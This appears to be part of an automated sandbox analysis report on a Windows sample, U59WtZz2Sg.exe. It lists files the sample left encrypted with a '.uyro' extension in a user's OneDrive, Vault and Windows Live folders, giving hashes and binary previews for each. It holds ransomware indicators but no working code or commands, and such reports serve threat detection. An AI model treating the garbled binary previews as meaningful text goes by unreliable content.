Preview:	<job>........&IQ.e.j.W(I+.I.L...1].........1..Fx.?XuBp...w.6.Q..N...y.K\Of.i......a..;E..\|.'^...X../1.d?y..%).B..ly..7....X6.#. ..PN...t.t....X.j.%p.B.W.n........R"!^.Gq....:....\k_!....2...P.)m@}.Q.q.......f.............z...m...O....>..+\|..ZD..9.o..W..YB\|_p....b......NH.J.s...-..C..ML......jN.]......U=..t..?+..g..n`...s2ms..f.$_.8<..Oo......'......8`6.yf.N!............b..<YU..g@t..X;+.@.z...\\.5.p..\|OpDhr..+...8..hK.).-M.vo.=.j....;W...y<i..{...f....g...N.{....yo.L............7...yw.1....S.&....w.....Z;A........n....%....P<.N.+D.`.)v..~.9.../..eFE...O..6.2RN..NT<3.ik.....Y>C..1s..,.V....+[..R..D0}...]..$.(.$...Q...2..LFh%tLs..3Y.......w \.....s.,..{.;T..dn...H.=.c.v>.{;R.K...c......x....N..\5......2f[L..B...b...m. O$.n.6.S..:...A.9...03.4.j\|2J.?.X..z..\|g...f..[.....h.sD...o...9.f%...>..yo/.b'...G.u......0..Ft..3...\.p9Ed.eY....(..Xa.......%9.%..KW.Y5J5...w....>.E.R.. .m...C.E.-.sr..j..e.\.n.>{..m..+........GQ.+{..o...oS.....Z.I...bL...

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 8837
Category:	dropped
Size (bytes):	243823
Entropy (8bit):	7.9817627491627166
Encrypted:	false
SSDEEP:	6144:uFCiK7eiS+5Mlc6LuVyRmh13/Z0cI6j+Ve53dqtkD:uFp8p6LmyU3/Z06jxdqta
MD5:	C8C7B7E8EE4FC030F0192FE666CD6A7E
SHA1:	1CD744C6FD1B7DFF0467811FE09E02BD7ECE4BCF
SHA-256:	494E3472B6B22E2FA4F0F2B06F66F788B9F1EDF26C6F6C7F01A3CE9B1DBF6A4B
SHA-512:	6F6C64748A911A405CC2BF222F841F74B130C24B82B5DB3B1D9D9C465F091EB0D842866C8194CCFFCA8A1DA1A52F296A9730270C36FAC2D73D83C761A694ADE0
Malicious:	false
Reputation:	unknown
Preview:	GIF89.[.."n..E.c.@.......P...4.JY....Q.\|......}.=/b...GxY!C[.$1e..V...>+.,.......kn.....^Be=...Aylu...k.&..m-6z.d.>g..Mk..[....:o.....@../.;.q6...b,XQ..i`.M.a...q.].'.4M...../.....z_?>.;Lc9..5..^~........$......M...M.......;.._'f..g\|..+.6......^..[.Q....h{.G:..Zu...8.5.+qs.H....wa...%..?..>.h.S...W....~..g..4............2..!...-y...O...@.r.O.6n..p.nQ..<..E.._..W\Z..F...r...f.w(....3...b.......E3Y.'Kw.....J..+.EO.~..<".!9f.k......:%..j.R...&...T..pRu..%C.;&...._S.....BF$....x......H,P.-t....&..R\.C.....Z.....e....p.0&.......8./."..>.0..8....e,Q,Nm.1.....'...hh.5...+..ov.......7.p...W.C....D....Po.AQ...q..O.BRm.#..K..X.zlG.{...vky)\.Uh..+.3.o..0W.1.<.J.v...ms...n.A........u.C.N..B~)=..X......}....\.i.gE.......;7P52b\|3.V....F....p.J.......c.'.0..r...h.M........o.6Ut..v.....?8.y.....7M.....9df6..u^.&R.K.).I.H._E..h...L...}.....R(..P..N.%.O..0..S.OD../...R...\|........._;.Z.L.r...TY$.,..V.........<.hg.".)..{.j...:......s..blk.[tAy....-...BJ.p

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\TestSharePage.html.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.866370462094926
Encrypted:	false
SSDEEP:	24:YBI2Vr8u3SYuyH8ctwb4vXNbO/VldgtdthAVoCnCE/gq8Pyqxf7VDEXFiuWGcA/X:YBrrFSTycYpwdoQCe6NxDEVZWGzjD
MD5:	03DD850481537E07A6658779B15C5F4C
SHA1:	C06961DA410E05F97B14E8AC6CCFB97CCCD288D4
SHA-256:	499A9C52F18773D4E7D9759A319E743CCE39BF3CF541925BD3D3745228434A90
SHA-512:	569EF0261ACBE330C772B0347561CADA7581EE1B91ACDE209B8744FDF1F7839FC407D63FEDDD6E2B73A57DFB191CFB5C309D23D6C65CBE9FF95C2F16790053CF
Malicious:	false
Reputation:	unknown
Preview:	<!doc^..?8.)..?:=...).<gb.Z...)...'7........D...%>.n.$....Y.Oyu..n....b..t...1...s/o.U..S.q....,..x..d..I.j4......T.....qn.{..PGY...`)...8.s.AR}.md.C....L~......}...M...o.K...\|Q.....j...1.~...P..%L..U.v......;....4C.P...]Z]@....~.}.I.'.\|..&..4u...3....CM..G...}4=.T42.0.).\|.wR$....wZ.L..]5...Is.....;...M..L.8+..{. ......Z...1./..[..}.. .K.....@..6fL..zAL+.....1......J..F{O}...m\..T.(~.TZ..5j.^........c..r..U4K.`iP......+qjB.M.;.{O..O-..i..._7..6..ip.......O$w.w......l_+.....;......D .].J.oe..e..v............0:.V....>..V...cL&.......>..L'Q.An...dO......)....d...zbz9.#DG.O..'%...2".{..w{^.....p4#/e...._..@.......Rb...8.....t....Q..v.X.uL./-MlE..*j.V{....Kn........M.Z...#.)4'^4J#.bz.&.+z......l...U..m...c..-.6.J@H<T+O..v$z@2....=.0...]....2...y..2.+..Q!&.Yc...>(D:.y..`2.^...D..N....=}.V.k}..p........c.,....K\..l....n.....4:....1..(..Ly....^.....,..)....`R......>Z1J...J6.&..@7n.N.5t..=NV'......e............S.2.....B....p..8...f....:...F

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49463
Entropy (8bit):	7.99590032892925
Encrypted:	true
SSDEEP:	768:nkHRoPNOgjjAaXsKdfOOfIteANTnuKOEY1/M3If4Er8G+/a2xi0nOnQ:nkHqPNOmJf3Ita9EY23mhKGQ
MD5:	B12E3A915519D408D918DCDEA7ED8355
SHA1:	628F141233F5E96AD29B08A9EC1DC66535D971F5
SHA-256:	E9516FF34567B7FAAA2C86FFC95CD1078B8401873CDF79FA459B9C5A08C5C677
SHA-512:	393F51E9B802B28089B3008485566599F0E0C47850A0C485F0F262D856733B2E0C4D5DA6B70CA586EE0A532F05455406079D67DA601685F36EDBA87EE4D5F362
Malicious:	true
Reputation:	unknown
Preview:	.THm........A.9..q..d..d.X@Wr.!D...<...2....F.q...@]........`...JV.'.3.&....:9.>.\|....Ws.s;.D..e....a.U.....,.........T....e.... H`. ..b....s.i..b...:.....%.O(/LC.t4.t.-fq.7O..P.9-8........e.\|.....It...%.:..s..;.N.m..4e....E%W9.....l..P.k}..:.^...P...j..I.OUrDY.e.P.op%Q.B....b....PT.z6p..U..I+.[..)......]\....P"..L..]t..@m...:H...(L.i{A.N...+.w.&.1....9G...;.tV.%..,}..<EZFhV&....B..7.[..q3.......T.../......0..v....~N^...R...X<c..W.(....,CS.w.U~...f...3.B..3....3t..T.0.#v.p..>g.}.H0s..G..ujt...\|..Y...:.Vu.......N8.+e}"u.(...ZPKA..9!.Z..5.....h......4....f5=5d.U..,..!..ON...S..=..@...wp./^ZNCpG.f{.I!..._.E9S...mFs......~..;.1.......%B\.Z;..E:Fh.2.......$m..D..`.P.c....7....N...;.....A...+.&>...T[4%...b\...w.7...B..!A.,.....0.g..+..d...j....X........%...s..}2n..M=..A....o"....N..a....C.....i`$......).@....OER......{....e}.Z.]s.";..p..f.(.~.u%G.89\..0....~.=.....Z!..'+.B........;....9......P...^..w.....6!.R"R.....././.8.*.....d..;..@..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\Warning.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2927
Entropy (8bit):	7.930760695081802
Encrypted:	false
SSDEEP:	48:D0V8yW5j82chYraolCNppcvcioQjzAQEhIjILR4fS+zD4A8ibY3bliJ6TD:y1W5AthYUppcvljE5hOw4/7hAig/
MD5:	759B8F9F8679F7D637FA5CF2D0AF0A67
SHA1:	0454D224B702EFF7F57C84C62F79A54CBDD54F66
SHA-256:	C803A3EBB3D5D37C649600D8289799112F4B654E870A0E8B28FECE590EE35A27
SHA-512:	21DC104E51708FB9C8D0EEA85EF54EDD1A772A537A54429B2A916A4A7C2417CE3B18424C5F8C4C85C68E520C3888E7384A97FAABCBFF40198A5C8F92CAC1B53B
Malicious:	false
Reputation:	unknown
Preview:	.PNG....+...0.Vy.u./.Z!.8.E..^}.-.).](...6M..z0.g%..5.".t......R....7g...L.7...Y..k.&hg..[q..t.......O@.S0.c.y...z..@@.j.....O).}G...2p.d.%4.U....1.2.4.....E.'R..k~.........M.&.@..3..:.Ea..e.....W.&....+Z...c2.K...#e)....s.....W.b..!..v.!b.Us!o..Y..+..(.X...4.......C.^....u..4.R...&...Z...r$..?..<.;...(.".\|....-u..YBSt.x.7.D.......kf-z.I...'.i9......~r....u.I..4.....N}.H.....19.....0....C......^..u..[.F...x....T.I.72..T[...u.........J....3....F....Jt....9<....]-#.\|.1;......8....S8..2.{.q....<.........~w...'.P.....S......[.}..Gm.......7...ua...t`!w.'a......=.....R>.%.S.2..#....LKzQ..w..,...K.....@.N..bl..qq8...mC.\|..%..L.w.$.....,B...l@.C.CQ......w.`.1pP(m..i..K.X...K3..So.)C.w.....\..........qu..t.J8.h...0{.nNt.....s.J.b...Ubs...-.cKE)...V.B.7t..h..M..U1...3D....d.ew...~d$.wwA...v.G.#..mbO.....6.5.d.;...W..Ie ...(0..".5........f...ReC...........*.......wo.........hi.Jm...........z.X..g&/(.]5..y..]3d...wM.i...3J.4j%.2..!..6..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\alertIcon.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1052
Entropy (8bit):	7.810091904581177
Encrypted:	false
SSDEEP:	24:roDy+JYfHD3NepTDom3lnkjhuiubL2lA/7VYAkXegfIepGcrv7roOxbD:reJqHD3NEjkwiW2E7VY5XegAevXrThD
MD5:	08F90C3B1FD15F445DB3370C2FEC9AC7
SHA1:	C6ADD9A9BB25FC6BD96E77EDEB5F96BA3F136382
SHA-256:	695D0043202C4FEC93AD331DC03FCE90582052EE95CF86EBC32C30AE04F53A93
SHA-512:	1451145B6941D4AC481CAF06BDE8B12390E6AE6ECFB145492B0F311616B6ABC13681E0C2E1DE3473F51394FF9967F2F878F787153AC5A363BB15B9A9E0041DF3
Malicious:	false
Reputation:	unknown
Preview:	.PNG...7...qt.,....M.8.[.D....C..#...?..L.f.V.........7.(..Pt...AqU;...@..9..:.o.9.&U.X<.mW...?....._.z.U...J.././_...C....$&.S.....:.c...z ..DbN.d`....@....,l5.....2#...I$.,.. S..E&o]7...p.C.F....v.da.-F...2.;u.S ....q..s%,..Cl........4...:bMn..t.g.A3]...j.....u0..6..).@..r=.[..i.m.K.......S..m@..7'.RM.&.......,.S. ....j....I5QI..<.?9.....6"`w......8..l/..../~...?.#.X._....P.....oU-NCA.~.;...f._.P.)....M..c..NYAW....H3..m................z...}1N.P\Y.}.{@.-...X....t..vg..a/...Z@...h%B.\|(..2.2.....k:.u.U.bz.fD.....u>ev..........K......<M.^.~.yb..ZF.]...WQ..{>...../.CI.4.[./u.a..L........`<}..A.p.8n....\|.....g.`...y..X.vi.. XUUR...=/....K.c.h..........M...w.>.p9.{2j.G;.N%.{.}...HCrw\KW.;....I=B..9s...9..^....2....5.Z..v..Pv.d..k.oGH_.9...".aVa....uh.Rp.K..0..&.A.....W^d..!.....Q.)..4..8V.G.ch(...aB..2{xu.x_~..*...+.......I..B\|..E31...Co.@.....Y.U...&...j;...p...i.)......;...!..r...m.0.)r.......Lv..+\|.o..k.\K6te1YGPnIbo4GcGOEP3iHx1cF

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\vaultIntro.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	12465
Entropy (8bit):	7.982487798777959
Encrypted:	false
SSDEEP:	384:Hi+xHZRHVbhpTDmT3s7810TWh4zQVa4S6VCT:nxHxhBmTca0T936ET
MD5:	5BBFB601FA0D0C756C4FCA04EEE13A32
SHA1:	9C6F7D5BAD7BC021526F5B1EF68BB052906E23CC
SHA-256:	3C1BBEEEF1DFF39DEED58A7357D783EAD0DF19EA27A158F79AA9A8B0C0A2D5D5
SHA-512:	0F00BC07934FEB20155049DD532287F683B5C818052D0B9B00C9AFADDF1504175C23DBDCE376DAF704589A368C64D8534FA43744985CE0E5B5DEDD4B4D046F7C
Malicious:	false
Reputation:	unknown
Preview:	.PNG...0.a.\|zyq....&...6M.J..H.F...6Z.!.p.]H)H1...<I..Q...8.....p...z..f..@.-....V@~..bm(+.M....<..8......9.....v......ZfO...3P..(.)..i..LR.E{...Z..gu.>.....?0.A.T..V.8...4].t....:II.'..gu.._..a#$lv.2@.@(../#>.pM...W.P@.F....6u.NT].......vP......7^..B....(.P..8.X.O;.Y.....9..UX?.3.../.u...g.r.4.c8{\....p^.,.u..........qSZ.p..^h......v^,.H..x[-.$.`+.zD....'.+$V..k.....<.Ds...v(.wRK...^]..........6.y^.O.F..(.Ij.c..&..p....7p..fVM.^..B.;..+......^.o..+....X.Pdq....L..+.3...........8....ze.<9..z..uT.3G.O....P.T.\......P..9W_....SJ..K......_.}.........\|>..eAU..._......d.aj`^...q.}.t..U:.[7.z.....s] .?G.U.~/'."E.v...[aj.....{S...74cki....r.j....h........L...._Z.+.../.....r...,`b..D...Q6ToD...q.....$n@.zr../...@..C....t..Id..{k.;..fs.4MKr.........PI..\.....2.y.fM..L...=..<0..$,..^.dxoU<9nE.~S:;n..b.Os......n+.....n..6&.Y`.[.<*.<n...Y..k..........HS0.....v..,.~.Ni...o.[6....)8-.}..9......TJ.Ik.....P.....Y..k.2D!..0KZ..%.6..zN.6 x...Y

C:\Users\user\Local Settings\Microsoft\OneDrive\setup\ECSConfig.json.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	598
Entropy (8bit):	7.626753725590998
Encrypted:	false
SSDEEP:	12:YquPg3uVZd35O2CJJ7R1CsMgMh6HBlZlTR+WaxYTtlqoHM9Isdtcii9a:Yqu1dY53qcZlTR+FY5ces/bD
MD5:	9F870DB20952CFAE48C0328C2BFE2CF8
SHA1:	A2D37694EB68A1410D4755E7422CF75C48FBBFC7
SHA-256:	E29F39F017BF4E889C3671B4D3B54E42532257511D3F7D9B6BD23466862C23EE
SHA-512:	235315FB5E95D3673A4B15A5C940BBD28479432DF19364DBA3465A5739804285916A713391C3DBA2EBB68F43AA10CA89018FAD2AA292149CBA2F25EAB958EACF
Malicious:	false
Reputation:	unknown
Preview:	{"ODS_.c{S..9.a.:T....9..3.@.N..B.lk R.....S]..w..b...W.;Z.]..A.1l.e.q....EB.}a'.T..q.=....N.jD.....}#.C...N..%.a...)F.x.n..,..T.4...^.......#W.7.J....+.b.....>.......L........W5O}.c.z....1.E.._....B....1.....w~......P..~.&...w...j...@#../.4........n./l.B/......g......?....R....~..t..94......i.*....g.O........lc.\|....W......... ...j\...%.K.p..ST.....6.P.f......@....a).YO/..h..:..4T..W..~_e[....W./..xh....I._(..[~.;.U+.."Z=H...N.'..E.>..\|/..R.....P..}`..D.T.h.....N(.Q..,....e.....S....bK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1318
Entropy (8bit):	7.830644004392996
Encrypted:	false
SSDEEP:	24:YWKbJiFLbP50CFk2vxCVfTT/R0Ax+fin4oIAGosCwwjSDFO/HN4f3ObD:YjEBP7afP/fx+K4Tp7CwwjSwt40D
MD5:	8C5CB35F9030E2F7CFF03AA47A723D6C
SHA1:	D415F057CD92F8840FF9485B5FC8D53AEA0B1A02
SHA-256:	C6B451E8E5FEB09D3930986E1867462870DD60A603756A9029569CDBB8F39A44
SHA-512:	E4EE46421DBCE88777201A7374E3EF50CA97076B0EF74A9E15B295FAC4DEB452BC04CB9C317C5D95D8D39154A7333FBC321641EF0D383AC781C766E0DEE40766
Malicious:	false
Reputation:	unknown
Preview:	{"Rec...`. 7w...NY..qf..88.3\|.8...)...3.c~.c..0o....R.c\....\...j...!.......7...%.....{...F..#B.l..B...z9.e%..b..'%.!..,..l......c=.e0%Bu.p..O....)..W.K...i...)...0.c....Hb...C{ty..V.....cI.....#R..f.{<...mc/~.,............j.....RQ8~.C....i.-..XM'.......`.v....\|..s.u. .~...M.......NnR.z.U..3.Z....>gj.F..k.D<.}.J,...)zAz..=....3....c..\|}9S..pc...!..L..!.C..[...-.C.%..v.'}..c.$.......o}...".P......g..w....UGC.+JI.5...iTG..m.13...p......"E>.0....:..R...n....s...^<.WA.)......A=T....c.\|@.".7.sa......I.f...0.v..0..a.-.@.._/.....G.E..._.1.......t..[..B$...n`.$.....!.b..R....N.........:....=.;.3!>F.8s(.o.c._...:f...)...%..[...W.:....7.....S5.t._...s.M (.U).O.........`i.O.U....H..3...P0....I..@..GBq.t'Y....zE.e......Ga.a.fJ).<....P.HlK<...\|..5....a...\|...KV.....:.Aw.O....c..={......`.0.=I.5.1z...c..R...50.Y..)3kp.%5u.u...bU:.`.o?QK...m.(>i8l+..V......`3C..8.c..d..6o.\.....w.c..2.!L..sPsLMi..U.e~..a.....}i0...v.DQ>:..y.....EQ.q..8~....\1...L@....

C:\Users\user\Local Settings\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	770
Entropy (8bit):	7.7429720740999075
Encrypted:	false
SSDEEP:	24:V1nLQCI3XTm4qsSaiiRmumafMJ8YUYTbD:V+CqYi3mzDhD
MD5:	DE832E3406D9641AF31508EFB96E302A
SHA1:	056AA3D910AACCA4BA775208CA73237204C839E6
SHA-256:	EFE66465A69106C50A449CEA69CD4B5A9CB2B0AC545B5162716E5081BED8748E
SHA-512:	8D1C408E244217C27950FF08DB3AB142015BEDB64B41EF1415DC2F5C6DA95D8F77BD023E396B7AD38F009A5EF3D6A4F4938A22B784BD679EBD8DE352BFFD8CEC
Malicious:	false
Reputation:	unknown
Preview:	....B..3...9.....4..p.:.s.2..O..U?:.g3;.....U..&...)d...u ZD.K...O'.d...[P.wS..m...0=Tj0Q...0.`b...,.Y..i..R....he..._.1.Qg.d2.V....lJ.....f.%.Yk.<..1E...<..>&x...D....9..mR..x .ly...~..2q.B..x+...~.x..vR}.........{..n5..I.t.D.7...4w....@e{...(.....q.b4A.L.Q..pS..=.L...TW....^Q.mE..h.I......?.Z?..{.................(..W.Mz.6.'.=...l....I'....3...A..9....Q...M....f.+..Jr].d,.....Q.1..9...4.gM.\.....F>J.....f....U.....>.G.s.....5..v.g;..Fj.....i.^na.e.SJi..r............%.8..[......f.YUg.........r...P..p]N..7U.Q.\|.i..6...\v.."......U.JA.7...<-K..^B]...].NT..b.}..u.q.y.!.f....1$(W..(;Ui........&.O)a..7Gn...<r..P.gd.'.[....0.un..&`.K........{L"..5pG.6....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_00.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1752
Entropy (8bit):	7.884505042548678
Encrypted:	false
SSDEEP:	24:af0ZLkbCVBB4Yu0MHaVYao2UmRGDrAP8jZbUG/Mf3Fxsaa+ZOZJkJbOHRfFH/bD:U0ObCVUYlM6w2VUrhw3DG+obkFOHRfdD
MD5:	CE3817808110C58C90D9C607B91022BF
SHA1:	0DCC4D8536E5D0FF30F607CE3A7B79EB398A4C27
SHA-256:	A3E236DA1399D482CC071ABE7D12CA31EA40503C343403A7F03F496C3394AE36
SHA-512:	A01DD1DE4B2ECA098AD8A29795DD387B1AB072A1BB65483E7B89E6F126E4633917F5B684E14510675E16271C6C9128BC8F308B73E86D3C3C1B916C7D640EB303
Malicious:	false
Reputation:	unknown
Preview:	MSQMx;....(..rCJ.".%Z.{...G.'."....M .W....G.=.7~..:.^...n;\~,@..8..Mi.v...w.N.=........`...s..G....Ye...5.0...X....."....>."...;..T.ko...u....z(...Z0`/.....X.._.?3.a...Z..V...#d8f.$F..N.9ts ".y.S.........r.)..D[2.&L..4../.....M..b.}VEW...Yj"....M.-c0.+.....hA..M....]./9j.}..._&... K.i?.)...{.<.........t..f,x6@..~...wf..#V8L.N..c-.z%.L...R..........5f..qk].Y........j>...^B....E..9wv..r[ "Dyb....O..s..<........0.j...k.0...,...........Y-Z..;.%.p......Z[....f...R.....CLvZ.H2..BV!X<.p...m.....,K..5...@.....s.CE..{.x._."-..1T.\|.bv..N'..F1`RQ.a..fN=.f`..D+.HR.......j..`...84ys...c.....g...F.PA..~X......GM.....Rp.>x.+..Ko...k1>K....B.Y..P.....%T<..;{......;.E... &5.A....a.G0T.?.....;.'..x....~..^....../XY.^k...g{.b...#..4y(..fR..xV{....hw_KN.......:...w>.by..<....).1..O......eb..q.......M).).0.....,.Nt..>d$P.k`'.%.K...[..quh...p.1..d;..@..K..^.Vbe...}..<.....c).o...N..8x.g^.^....9D.>r`CJ!.............BV..t.!.o$..w4;...Ze..w.l. ....lu.664;

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_01.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	7.818874730209985
Encrypted:	false
SSDEEP:	24:jBT0+LkmzIECRcBlQ5NJPa8bnwh20YUI1hR7rDv0hmfzyLDbD:+KnCkQ53aE70Yj1nrDv0EoXD
MD5:	C8EC6552FCF6E04CF572E91DCA9444B5
SHA1:	3A2CFA3DE6F369673692396F1E1D632EAC16BF09
SHA-256:	1148DFC2B376FC260AAB92F57CA1C423D3C25BF97054DD90903354D4D02196C6
SHA-512:	4A121CF1703061D1B59F8AC47444171A66188FDAF90EDFDF6C47EC32E4B9877465558DEC281B651C4D930B024037BB519DD15ABDB81CAB30F8DA86FC5B2DA218
Malicious:	false
Reputation:	unknown
Preview:	MSQMxERG3...J.t..T.O......Q.=...`9'..@.W....M<.....T........UV..dF.`.O..........fn..O...<.}.Cf........y.Iu..i..\>....1.x%....x.$eeL.....<...<n.>".........}.uq]F...e}...n..2...n.@+J...l.D..a......y...4.c.Sc...6....2a..E(..[..Ka....b{OTf.L...G.2..s:.Y+.f.0"X...G\.=5M.+#P.?...T.$6>Q.f8....P']......,.....F.........T!+.Z.....L..~....gA..D....=.2..$u................o...F..P........2.....Qr...=>._..2kR1..!).(..J..$.Tut....&n..0H..w&1.a>G.......x.f...j .....r...........'....,...wA........rMcQ......Ue.....6.[../..;x6QKLv..r?}.wK..G;...2..-.T..[.HQ.?.....Q...P...n`.s...k.6.............T..d[T\|..z_NK?w.......W.\........0.$....\|..'..1....\|p...h.....oe..b..1.Hc...j.VY.....R8....G:`....@:&.&..CRt49Mo&.}.IM>X....}P.t).>.. ...^.x..........#..Z8T.@.A.L...&.X....D...1....7..mU..Y.4..uj.^..9...g.....E..<Z.......g.e...h.....P_..LK.z-7X*..{.e1.PD..-......K....."....GHS-I{..F...8..g..$.....,...K!...{..y..]",.,....<O#"..p....N..........aBZ

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_02.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1038
Entropy (8bit):	7.784680257455865
Encrypted:	false
SSDEEP:	24:Y4QHWzCrdN3ViBW8iakXt6JCFcxzwbR0byWbD:Y4Q6CjliYtICFcSbOBD
MD5:	F4FA23190D4EDBEF344424751D7DACEA
SHA1:	B2802BEAF1B9C278E49C5BCAAB91A076F2021D29
SHA-256:	37BE5692A7889539276BD851CFE3589DB2775AB8B1010C44CA8E98FDC7F9FECF
SHA-512:	772ADFD38037BD39BCDFAD3A12B1CFA70720A86E4669EEE66A14F88A340A1060DFEB4BCCB516E8652654F645F9BD1274CD5DB03F69F387A732C559EA1723B537
Malicious:	false
Reputation:	unknown
Preview:	MSQMx ?.G....8.K..+..GS=3.b.....w.dE.z......%m.1umz....l..d..O..p..+.~..2x..[..)......a9Q..W.K7...\.5i.W.Z...E..T9.......}..6.R...]T..Pq.o.....vS?} B[H\|.?..1..#.6...Y.Z....s.aa80....Y..h.\|..z^Nr[ .ri.....]....W....971%.n.CJ/.X..6...i.s.IzA..il.....g.y..+1..."=!.7.g..Y2o..;.YW....n......ST4,y....6".vt.Io.s......:m.O.....N.G.%2.#]-..L$..n....u~.....q[F....../`.........'Z.....M....$7h5.....c....!m,..E...#.....j.0.'...[...e.j\|.\..=..F.-.k..5G.......I.9M................7~.[\|.;.......'E.m....V..#M.....L..$.nC.].6...OQ.l...U.{>.yq.......:.&+s."F.GS..7S.Fg...uq.w..v.......n.b.}.>..o..P..x....0zV...5..<...s.:..W.M.{....ud`...i<....N. ].D.x....f...O....}.{...+.B.]...\|bF..~.q/...z..wU.Zy.y.i.........:s..Dm...Z.yK.r..............A[]....;..k.......<.wL........"v'..'.X..c..C...a6.C.S.;l.ox.NH`.L.U...Ra.ni..mY.E0.y...i.1....bU+....,X...-..U.q.C.Sl%B..H:...8...II...*...5stoW..r`0.a..;....lEv...snsFE."..+._..`..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_03.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1230
Entropy (8bit):	7.822709067343889
Encrypted:	false
SSDEEP:	24:X4YAg0hvMT55Rof2ezGRhjQbC9lwrfYmEKUpv3vHDWjgh3bD:XShvc5RkpzGr8bC9lwzUpv3rRtD
MD5:	44F32801CA8056465122EC61907B5DE8
SHA1:	AA78A376A3C6C17A0CD90BECED77366ECD9F0266
SHA-256:	EA63213605FE12669875803545F70F629DF6E768BBF5D05A482A385B48D46EE7
SHA-512:	4A531F5FCAE49A1C93B429C87160A16F0C5F1AF7174C9D30434B7A4993CCC6124B44146B0101D9797EDA7A0B8F915659E5446D6B7722B774709FF1E8BA94F094
Malicious:	false
Reputation:	unknown
Preview:	MSQMx..X...{.h.....)A.7.:..8.......&iUb.h.?....9Y.0Z....$...ykk._...6l...8..bt72...Uf...+..Y4lB.%L......G....O....9......B.+c.:.. .o....dO...!..U.K....CI^...8....V"....\|2T.e\.e.....@`....om. ...8.H7..WG.z.\|..p"......oX..c...X!..I.\|.U...(..n.......8......}..s....GOE.!..."RB..C......../..T.i...v.J4..J.T.....W......_..V...T.=..ZOh.^r._....d........b.ne,%S.zB..La3....D...v..q.....x[N...0.w.....x!}.\o...<...l$..n_...7K9..~.z.e.~vF.^..&E.v.c.hU..d..nr}..!.8...d..3}..`3.....2k.;.$M^.a._5.g..%1..+...3..D........T..K0K.H8....s...r...E.n..:.........us]7.p.......-..E..\|.{~.;?..X.d.0..?...@p..t.r...~g.d<c&...l.....4.V]...\...x(;...H.Md.....2..KZy...5..6fjoQ.Gw...]..S.cH......j.[>..y...T..7.&?.6.e..CB.E!/.....Pa.+Z..G[.K.t}...oC..^.I..$..._.3..0...R.'Q.P..... ?..`1P..V....y......%.=..4O..p.Tp.}.`3Z`..d.......?...x.u...1......f~K.?r&...h.'....F......o.j$..j_......t~M4..........{..7.!VInfU3^..K.t..B..LX..F.RX....x..@Y.......n..D\|5.{.I..C..-.-.......#..@.

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_04.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.804917573052824
Encrypted:	false
SSDEEP:	24:f955+qFfyGvcJqBxPmv+eY+pF60TYXeOD8vY57JpbD:V5oqFfyNJeKy+pF7UXHWY5lJD
MD5:	4FED3FEAF3F36278EBB06617DC259C0C
SHA1:	2A31F151219FCF246C854CA97E2D5D75D217ECAE
SHA-256:	5564BF7A6DEAE25ECF797D9B00DEC555EE33059208B2904A98E45E65FD7658A4
SHA-512:	1768A72560AF634527F189F4E5359D7A700B66C1862FCB5C186E68995E0E8523BEBA2B24A24D938F9DF5F5A88CC5DCCCB43ABD51B7D364F4764071AE1172714C
Malicious:	false
Reputation:	unknown
